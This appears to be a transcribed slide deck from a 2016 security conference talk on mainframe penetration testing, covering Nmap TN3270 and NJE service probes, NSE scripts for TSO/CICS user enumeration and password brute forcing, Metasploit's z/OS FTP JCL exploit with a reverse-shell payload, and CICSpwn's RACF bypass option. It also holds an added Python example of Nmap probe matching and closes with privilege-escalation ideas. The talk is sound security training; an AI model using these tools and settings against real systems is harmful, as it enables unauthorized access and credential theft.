Advanced mainframe hacking
Vanguard Compliance and Security class teaching how to use the various cybersecurity tools out there for mainframe hacking.

Published in: Technology
1. Advanced Mainframe Hacking
   Philip Young, ZedSec 390
   CST08, VANGUARD SECURITY & COMPLIANCE CONFERENCE 2016

2. Disclaimer
   I’m not here in the name of or on behalf of my employer. All opinions expressed here are my own.

3. About Me!

4. Purpose
   This session will:
   • Go over the tools introduced in Monday’s keynote
   • Explain what’s going on behind the scenes
   • Show you how to use the tools

5. Tools Covered
   • Nmap
   • Metasploit
   • CICSpwn
   • ELV.APF

6. Platform
   • Linux (Kali Linux)
   • VMware
   • macOS
   • VPS

7. Kali Linux
   • A Linux distribution
   • Comes pre-loaded with multiple tools:
     • BURP
     • Metasploit
     • BeEF
     • Many more

8. DEMO

9. Nmap
   • Created in 1997
   • By: Fyodor
   • Mostly ‘C’
   • Includes Service Detection
   • Added Scripting Engine in ‘07

10. Nmap
   • Network MAP
   • Uses various techniques to discover open ports
   • E.g. “SYN Scan”

11. Service Probes
   • Identify what is running on a port
   • Uses TCP/UDP probes

12. Nmap Probes
   • Use the flag: ‘-sV’
   • Null Probe: matches data sent to Nmap
   • Approx 4,000 ‘Null Probes’
   Let’s look at TN3270*:
   match tn3270 m|^\xff\xfd\x1d| p/IBM Telnet TN3270/ i/3270-REGIME/
   * line 4606 in nmap-service-probes

13. TN3270 Null Probe
   match -> ‘Match the following’
   tn3270 -> ‘with tn3270’
   m|^\xff\xfd\x1d| -> \xff\xfd\x1d = IAC DO TN3270E
   p/IBM Telnet TN3270/ -> Set to ‘IBM Telnet…’

14. Other Probes
   • TCP Probes
   • Send data, inspect reply
   • For example, the Network Job Entry probe:

15. NJE Probe
   • Sends an invalid NJE ‘OPEN’ packet
   • Waits for either ‘ACK’ or ‘NAK’ in EBCDIC
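
The matching logic behind the ‘-sV’ slides above, as an added worked example (not code from the slides or from Nmap itself): it parses two ‘match’ lines in nmap-service-probes syntax (the tn3270 line quoted on slide 12, plus a constructed ssh line to show how $N back-references fill the p/v/i fields), evaluates them against constructed sample responses the way Nmap’s NULL probe would, decodes the Telnet negotiation bytes slide 13 explains as IAC DO TN3270E, and checks an NJE reply for ‘ACK’ or ‘NAK’ in EBCDIC (code page 037, as on slide 15). The ssh line, the option-name table and every sample byte string are this example’s own constructions, not values taken from the deck.

```python
# Added worked example (not from the slides or from Nmap's own code): a
# minimal re-implementation of how an nmap-service-probes NULL-probe `match`
# line is evaluated, plus the two response checks the TN3270 and NJE slides
# describe. Sample responses below are constructed, not captured from a host.
import re

# The tn3270 line is the one quoted on the slide; the ssh line is a constructed
# example in the same syntax to show $N back-references into p/v/i fields.
MATCH_LINES = [
    r"match tn3270 m|^\xff\xfd\x1d| p/IBM Telnet TN3270/ i/3270-REGIME/",
    r"match ssh m|^SSH-([\d.]+)-OpenSSH_([\w.]+)| p/OpenSSH/ v/$2/ i/protocol $1/",
]

# match <service> m<delim>regex<delim>[flags] followed by p/ v/ i/ h/ o/ d/ fields
MATCH_RE = re.compile(r"^match\s+(\S+)\s+m(?P<d>[|/%=@])(.+?)(?P=d)([is]*)\s*(.*)$")
FIELD_RE = re.compile(r"([pvihod])(?P<d>[|/%=@])(.*?)(?P=d)")


def parse_match_line(line):
    """Turn one `match` line into a compiled bytes regex plus its info fields."""
    m = MATCH_RE.match(line)
    if not m:
        raise ValueError(f"not a match line: {line!r}")
    service, _delim, pattern, flags, rest = m.groups()
    re_flags = re.IGNORECASE if "i" in flags else 0
    if "s" in flags:
        re_flags |= re.DOTALL
    # latin-1 keeps the \xNN escapes as text; the bytes regex then interprets them
    return {
        "service": service,
        "regex": re.compile(pattern.encode("latin-1"), re_flags),
        "fields": {key: val for key, _d, val in FIELD_RE.findall(rest)},
    }


def identify(response, rules):
    """First matching rule wins, as in Nmap; $N in a field expands to regex group N."""
    for rule in rules:
        hit = rule["regex"].search(response)
        if not hit:
            continue

        def expand(text):
            return re.sub(r"\$(\d+)",
                          lambda g: hit.group(int(g.group(1))).decode("latin-1"),
                          text)
        return {"service": rule["service"],
                **{k: expand(v) for k, v in rule["fields"].items()}}
    return None


# Telnet negotiation bytes: the slide decodes \xff\xfd\x1d as IAC DO TN3270E.
TELNET_CMD = {0xfb: "WILL", 0xfc: "WONT", 0xfd: "DO", 0xfe: "DONT"}
TELNET_OPT = {0x00: "BINARY", 0x18: "TERMINAL-TYPE", 0x19: "END-OF-RECORD", 0x1d: "TN3270E"}


def decode_telnet_negotiation(data):
    """Render the leading IAC <cmd> <opt> triples of a banner as text."""
    out, i = [], 0
    while i + 2 < len(data) and data[i] == 0xff and data[i + 1] in TELNET_CMD:
        opt = TELNET_OPT.get(data[i + 2], f"option {data[i + 2]}")
        out.append(f"IAC {TELNET_CMD[data[i + 1]]} {opt}")
        i += 3
    return out


def classify_nje_reply(data):
    """The NJE probe expects 'ACK' or 'NAK' in EBCDIC, so decode with code page 037."""
    text = data[:3].decode("cp037", errors="replace")
    return text if text in ("ACK", "NAK") else None


# Constructed sample responses (what a NULL probe might receive on a port).
SAMPLES = {
    "tn3270": b"\xff\xfd\x1d\xff\xfd\x18",          # IAC DO TN3270E, IAC DO TERMINAL-TYPE
    "ssh": b"SSH-2.0-OpenSSH_7.2p2 Ubuntu-4\r\n",
    "nje_ack": "ACK".encode("cp037") + b"\x00" * 5,  # EBCDIC, as the NJE probe expects
    "ascii_ack": b"ACK",                             # wrong code page: must NOT classify
}


def run_samples():
    rules = [parse_match_line(line) for line in MATCH_LINES]
    return {
        "tn3270": identify(SAMPLES["tn3270"], rules),
        "tn3270_negotiation": decode_telnet_negotiation(SAMPLES["tn3270"]),
        "ssh": identify(SAMPLES["ssh"], rules),
        "nje_ack": classify_nje_reply(SAMPLES["nje_ack"]),
        "ascii_ack": classify_nje_reply(SAMPLES["ascii_ack"]),
    }


if __name__ == "__main__":
    for name, result in run_samples().items():
        print(f"{name}: {result}")
```

The ASCII ‘ACK’ sample is there on purpose: an inventory or detection rule that forgets the EBCDIC decode will miss every NJE listener, which is exactly why the NJE probe on the slide specifies the code page.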
16. Nmap without Service Probes

17. Nmap WITH Service Probes

18. Nmap Scripting Engine (NSE)
   • Composed of libraries and scripts
   • Over 530 scripts available
   • 121 libraries
   • Uses Lua

19. NSE Categories
   AUTH, BROADCAST, BRUTE, DEFAULT, DISCOVERY, DOS, EXPLOIT, EXTERNAL, FUZZER, INTRUSIVE, MALWARE, SAFE, VERSION, VULN

20. TN3270 NSE Library
   • A ‘virtual’ TN3270 terminal written in Lua
   • Available: https://github.com/zedsec390/NMAP
   • Allows for the following:

21. Invoke
   • To invoke scripts use the flag --script (\ is line continuation in Linux)
   nmap -sV --script tn3270-screen

22-23. Additional TN3270 Scripts
   • VTAM Applid Enumeration
   • TSO:
     • User ID Enumeration
     • Password Brute Force
   • CICS:
     • Transaction Enumeration
     • User ID Enumeration
     • User Password Brute Forcing

24. TSO User Enumeration
   • Let’s walk through the arguments:
   • Note the libraries: brute & unpwdb
   Argument: Definition
   brute.maxthreads=100: Max number of concurrent connections. Set to 100.
   userdb=‘/tmp/users.txt’: File with usernames you want to test.
   tso-enum.commands=‘TSOL5’: The command used to get to TSO.

25. CICS Transaction Enumeration
   Argument: Definition
   brute.maxthreads=100: Max number of concurrent connections. Set to 100.
   idlist=‘/tmp/users.txt’: File with CICS transactions you’re looking for.
   cics-enum.commands=‘CICSTS29’: The command used to get to the CICS region.
   cics-enum.path=‘/home/test’: Successfully identified transaction screenshots will be placed in this folder.

26. DEMO

27. Metasploit Framework
   • Developed by H.D. Moore, 2003
   • Moved to Ruby in 2007
   • Created an easy-to-use exploit platform
   • Chad Rikansrud (@bigendiansmalls) added JCL and z/OS architecture support in 2016

28. Using MSF
   • Run ‘msfconsole’
   • To list all exploits: show exploits
   • Run the ONLY z/OS ‘exploit’: use exploit/mainframe/ftp/ftp_jcl_creds
   • Show the options with: show options
   • Fill in the options you need
   • Select which ‘payload’ you want to use

29. Set options
   • Exploit options:
   Option: Definition
   FTPUSER: User ID to use.
   FTPPASS: Password to use.
   RHOST: FTP hostname/IP address of target LPAR
   RPORT: FTP port (use Nmap)

30. Metasploit Payload Options
   Now select a payload:
   set payload cmd/mainframe/reverse_shell_jcl
   Change the payload options:
   Option: Definition
   LHOST: Our hostname or IP address
   LPORT: The port you want Metasploit to open a listener on.

31. DEMO

32. CICSpwn
   • Released this year by Ayoul
   • Relies on CEMT/CEDA transaction IDs (for now)
   • Uses CEMT to upload and execute JCL/REXX
   • Can be used to assess CICS and break in to environments
   • Requires Python 2.7

33. Interesting Options
   Invoke with: python cicspwn
   Flag: Definition
   -i: Gather information
   -A: Test all options
   -s: Upload JCL to be executed by CICS user (requires CEMT)
   --bypass: Will bypass RACF if CEDA is available.

34. DEMO

35. Where To From Here?

36. Escalation
   • So far only network based
   • What happens after access is granted?

37. Some Ideas
   • Storage ‘scrapers’ to gather system information (think ‘IPLINFO’ but built in to Metasploit)
   • Automated APF tools to attempt privilege escalation through zapping APF authorized modules
   • Data dumping tools to grab all datasets
   • SMP/E corruption

38. Why Not?
   • Make your own tools?
   I’d prefer the tools come with what the experts need, so they have it without knowing about it

39. Contact:
   mainframed767@gmail.com
   @mainframed767

40. Thank you!
   VANGUARD SECURITY & COMPLIANCE CONFERENCE 2016